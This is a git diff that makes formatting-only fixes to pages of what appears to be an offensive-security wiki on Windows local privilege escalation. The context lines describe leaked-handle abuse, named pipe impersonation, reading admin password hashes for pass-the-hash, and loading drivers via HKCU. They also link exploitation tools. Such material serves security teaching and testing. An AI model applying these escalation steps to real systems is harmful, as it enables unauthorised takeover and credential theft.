a/windows/windows-local-privilege-escalation/leaked-handle-exploitation.md +++ b/windows/windows-local-privilege-escalation/leaked-handle-exploitation.md @@ -45,7 +45,7 @@ If an **unprivileged process inherits** a **handle** with **write** equivalent * ### Process Hacker -****[**Process Hacker**](https://github.com/processhacker/processhacker) is a tool you can download for free. It has several amazing options to inspect processes and one of them is the **capability to see the handles of each process**. +[**Process Hacker**](https://github.com/processhacker/processhacker) is a tool you can download for free. It has several amazing options to inspect processes and one of them is the **capability to see the handles of each process**. Note that in order to **see all the handles of all the processes, the SeDebugPrivilege is needed** (so you need to run Process Hacker as administrator). @@ -65,7 +65,7 @@ The [**Handles** ](https://docs.microsoft.com/en-us/sysinternals/downloads/handl ### LeakedHandlesFinder -****[**This tool**](https://github.com/lab52io/LeakedHandlesFinder) allows you to **monitor** leaked **handles** and even **autoexploit** them to escalate privileges. +[**This tool**](https://github.com/lab52io/LeakedHandlesFinder) allows you to **monitor** leaked **handles** and even **autoexploit** them to escalate privileges. ### Methodology @@ -677,11 +677,11 @@ int main(int argc, char **argv) { ## Other tools and examples -* [**https://github.com/lab52io/LeakedHandlesFinder**](https://github.com/lab52io/LeakedHandlesFinder)**** +* [**https://github.com/lab52io/LeakedHandlesFinder**](https://github.com/lab52io/LeakedHandlesFinder) This tool allows you to monitor leaked handles to find vulnerable ones and even auto-exploit them. It also has a tool to leak one. -* [**https://github.com/abankalarm/ReHacks/tree/main/Leaky%20Handles**](https://github.com/abankalarm/ReHacks/tree/main/Leaky%20Handles)**** +* [**https://github.com/abankalarm/ReHacks/tree/main/Leaky%20Handles**](https://github.com/abankalarm/ReHacks/tree/main/Leaky%20Handles) Another tool to leak a handle and exploit it. diff --git a/windows/windows-local-privilege-escalation/named-pipe-client-impersonation.md b/windows/windows-local-privilege-escalation/named-pipe-client-impersonation.md index d5a3b444..2fd4cdd7 100644 --- a/windows/windows-local-privilege-escalation/named-pipe-client-impersonation.md +++ b/windows/windows-local-privilege-escalation/named-pipe-client-impersonation.md @@ -1,6 +1,6 @@ # Named Pipe Client Impersonation -**This information was copied from** [**https://ired.team/offensive-security/privilege-escalation/windows-namedpipes-privilege-escalation**](https://ired.team/offensive-security/privilege-escalation/windows-namedpipes-privilege-escalation)**** +**This information was copied from** [**https://ired.team/offensive-security/privilege-escalation/windows-namedpipes-privilege-escalation**](https://ired.team/offensive-security/privilege-escalation/windows-namedpipes-privilege-escalation) ## Overview @@ -119,7 +119,7 @@ Note that in order to impersonate the token of the client process you need to ha It is possible for the named pipe server to impersonate the named pipe client's security context by leveraging a `ImpersonateNamedPipeClient` API call which in turn changes the named pipe server's current thread's token with that of the named pipe client's token. -We can update the the named pipe server's code like this to achieve the impersonation - note that modifications are seen in line 25 and below: +We can update the the named pipe server's code like this to achieve the impersonation - note that modifications are seen in line 25 and below: ```cpp int main() { diff --git a/windows/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.md b/windows/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.md index c95cbc1a..69787106 100644 --- a/windows/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.md +++ b/windows/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.md @@ -28,7 +28,7 @@ If you have enabled this token you can use **KERB\_S4U\_LOGON** to get an **impe This privilege causes the system to **grant all read access** control to any file (only read).\ Use it to **read the password hashes of local Administrator** accounts from the registry and then use "**psexec**" or "**wmicexec**" with the hash (PTH).\ - This attack won't work if the Local Administrator is disabled, or if it is configured that a Local Admin isn't admin if he is connected remotely.\ +This attack won't work if the Local Administrator is disabled, or if it is configured that a Local Admin isn't admin if he is connected remotely.\ You can **abuse this privilege** with: [https://github.com/Hackplayers/PsCabesha-tools/blob/master/Privesc/Acl-FullControl.ps1](https://github.com/Hackplayers/PsCabesha-tools/blob/master/Privesc/Acl-FullControl.ps1) or with [https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug](https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug) or following IppSec in [https://www.youtube.com/watch?v=IfCysW0Od8w\&t=2610\&ab\_channel=IppSec](https://www.youtube.com/watch?v=IfCysW0Od8w\&t=2610\&ab\_channel=IppSec) ### SeRestorePrivilege (3.1.5) @@ -39,16 +39,16 @@ You can **modify services**, DLL Hijacking, set **debugger** (Image File Executi ### SeCreateTokenPrivilege (3.1.6) This token **can be used** as EoP method **only** if the user **can impersonate** tokens (even without SeImpersonatePrivilege).\ - In a possible scenario, a user can impersonate the token if it is for the same user and the integrity level is less or equal to the current process integrity level.\ - In this case, the user could **create an impersonation token** and add to it a privileged group SID. +In a possible scenario, a user can impersonate the token if it is for the same user and the integrity level is less or equal to the current process integrity level.\ +In this case, the user could **create an impersonation token** and add to it a privileged group SID. ### SeLoadDriverPrivilege (3.1.7) **Load and unload device drivers.**\ -****You need to create an entry in the registry with values for ImagePath and Type.\ +You need to create an entry in the registry with values for ImagePath and Type.\ As you don't have access to write to HKLM, you have to **use HKCU**. But HKCU doesn't mean anything for the kernel, the way to guide the kernel here and use the expected path for a driver config is to use the path: "\Registry\User\S-1-5-21-582075628-3447520101-2530640108-1003\System\CurrentControlSet\Services\DriverName" (the ID is the **RID** of the current user).\ - So, you have to **create all that path inside HKCU and set the ImagePath** (path to the binary that is going to be executed) **and Type** (SERVICE\_KERNEL\_DRIVER 0x00000001).\ -[**Learn how to exploit it here.**](../active-directory-methodology/privileged-accounts-and-token-privileges.md#seloaddriverprivilege)**** +So, you have to **create all that path inside HKCU and set the ImagePath** (path to the binary that is going to be executed) **and Type** (SERVICE\_KERNEL\_DRIVER 0x00000001).\ +[**Learn how to exploit it here.**](../active-directory-methodology/privileged-accounts-and-token-privileges.md#seloaddriverprivilege) ### SeTakeOwnershipPrivilege (3.1.8)